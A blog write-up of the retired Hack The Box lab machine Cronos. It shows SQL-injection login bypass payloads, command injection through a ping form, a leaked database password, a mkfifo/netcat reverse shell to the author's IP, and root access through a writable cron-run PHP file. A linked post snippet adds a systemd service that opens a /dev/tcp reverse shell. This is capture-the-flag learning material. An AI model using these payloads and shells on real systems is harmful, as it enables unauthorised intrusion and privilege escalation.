Skip to main content

Hackthebox.eu - Retired - Cronos


Hackthebox.eu - Retired - Cronos

Recon

As always I start with a simple UP/Down scan on all TCP ports to see what is open
 nmap -T4 -p- -oX /home/circusmonkey/Desktop/HTB/cronos/nmapb.xml cronos.htb

Then I convert it to HTML to make it pretty
xsltproc /home/circusmonkey/Desktop/HTB/cronos/nmapb.xml -o /home/circusmonkey/Desktop/HTB/cronos/nmapb.html



On this box we see three open ports, pretty standard ports

22 SSH, 53 DNS and 80 HTTP

Let's scan against those ports with the -A switch to run all the things against them
$ nmap -T4  -A -p22,80,53 -oX ./nmapf.xml cronos.htb

I'll convert that to HTML too
$ xsltproc ./nmapf.xml  -o ./nmapf.html


Looks like we have an ubuntu box with openssh 7.2p2 on port 22
ISC BIND 8.10.3-p4 on port 53 
Apache 2.4.18 on 80


Here is what we see on port 80

Nothing too interesting in in the source code 

A bunch of links to things about something called Laravel?




It's a PHP framework


Robots.txt is wide open

Dirb found some directories and a config file for us

/JS
/CSS
/web.config

Here is the web.config file

What about the other open ports?
DNS was on 53 let's dig at it

Ok there are a couple of A records.

There is an MX record for admin.cronos.htb

Let's add that to our /etc/hosts

Cool a login form

TARGET ACQUIRED
Flying Target Acquired GIF

I captured the login for admin/admin in burp



Login name or password is invalid.

I was hoping to see a different message here about users not existing that we could use to enumerate users.

No such luck

Well what about some sql injection


I tried my normal go to for the password field

username=admin&password='or'1'='1



Nope…

What about in the username field?


Looks like we got a winner


A tool which we can ping or tracert from. Interesting.

Dirbuster found a couple of more php files on the server
Welcome.php - our tracert page.


We can ping our VPN IP From this app..




Can't really tell what it's doing behind the scenes exactly but it looks like it's taking the input from the form and just handing it over to the shell

Let's see if we can string together another command and start to work on a foothold here.

Let's do whoami

At first i tried &&

8.8.8.8 && whoami

Nothing.. This worked locally on my machine. I googled around for it and it could be because the && is dependent on the execution of the preceding command.

But ;  works not matter what happens with the preceding command let's try it


Cool we got the result we wanted we can see we have the output of the whoami command. We can move over to exploit from here.

Exploit


Let's poke around in the webapp a bit more..

ls 




What's in these files?

Let's cat them

8.8.8.8; cat config.php

define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'admin');
define('DB_PASSWORD', 'kEjdbRigfBHUREiNSDs');
define('DB_DATABASE', 'admin');
$db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
?>


8.8.8.8; cat session.php
include('config.php');
session_start();
$user_check = $_SESSION['login_user'];
$ses_sql = mysqli_query($db,"select username from admin where username = '$user_check' ");
$row = mysqli_fetch_array($ses_sql,MYSQLI_ASSOC);
$login_session = $row['username'];
if(!isset($_SESSION['login_user'])){
header("location:index.php");
}



8.8.8.8;cat welcome.php
include('session.php');

if($_SERVER["REQUEST_METHOD"] == "POST") {
//print_r($_POST);
$command = $_POST['command'];
$host = $_POST['host'];
exec($command.' '.$host, $output, $return);
//print_r($output);
}
?>



8.8.8.8; cat logout.php
session_start();

if(session_destroy()) {
header("Location: index.php");
}
?>

Well there was a sql admin password so that might come in handy

Testing to see if we can write to the current dir

8.8.8.8;mkdir test

8.8.8.8;pwd



ls /home gave us a user name


Noulis

Uname -a 




I tried getting a reverse shell with nc and didn't have any luck

Mkfifo to the rescue

Amazon Fly GIF

;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.48 4444 >/tmp/f

Setup my listener
nc -lnvp 4444



We got a shell




Yahoo Fantasy GIF


Let's get LinEnum over to the box and see if we can find anything worth checking out.

I copied LinEnum.sh over to the folder I was already serving with SimpleHTTPServer

Then on my new found shell


Gave execute rights to the file

Then ran
./LinEnum.sh


we'll
It looks like we can get user hash now





$ ls /home      
noulis
$ ls /home/noulis 
user.txt
$ cat /home/noulis/user.txt
51d********************************

I also saw this in LinEnum

A php file that is executed every minute as root.

Let's look at that file


Even better we have ownership of that file.


#!/usr/bin/env php
<?php

/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader
| for our application. We just need to utilize it! We'll require it
| into the script here so that we do not have to worry about the
| loading of any our classes "manually". Feels great to relax.
|
*/

require __DIR__.'/bootstrap/autoload.php';

$app = require_once __DIR__.'/bootstrap/app.php';

/*
|--------------------------------------------------------------------------
| Run The Artisan Application
|--------------------------------------------------------------------------
|
| When we run the console application, the current CLI command will be
| executed in this console and the response sent back to a terminal
| or another output device for the developers. Here goes nothing!
|
*/

$kernel = $app->make(Illuminate\Contracts\Console\Kernel::class);

$status = $kernel->handle(
    $input = new Symfony\Component\Console\Input\ArgvInput,
    new Symfony\Component\Console\Output\ConsoleOutput
);

/*
|--------------------------------------------------------------------------
| Shutdown The Application
|--------------------------------------------------------------------------
|
| Once Artisan has finished running. We will fire off the shutdown events
| so that any final work may be done by the application before we shut
| down the process. This is the last thing to happen to the request.
|
*/

$kernel->terminate($input, $status);

exit($status);


All I'm going to do here is amend this file to copy root.txt to my temp directory
By simply adding the line

echo copy("/root/root.txt", "/tmp/circusmonkey/root.txt");

For my own personal ease of use I copied out the file to my clipboard and created the artisan file on my attacking computer

Then simply added my line and served the file up using the same SimpleHTTPServer I've had running this whole time


Used wget to get the file downloaded to cronos. You can see it save it as artisan.1

So I did a mv to copy over artisan.

Now I just waited a minute for the php to run as root.



And there is our root hash.
$ cat /tmp/circusmonkey/root.txt
170*********************



Done The Office GIF











Labels:

Comments

Post a Comment

Popular posts from this blog

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar
Post a Comment
Read more

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z
Post a Comment
Read more

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The
Post a Comment
Read more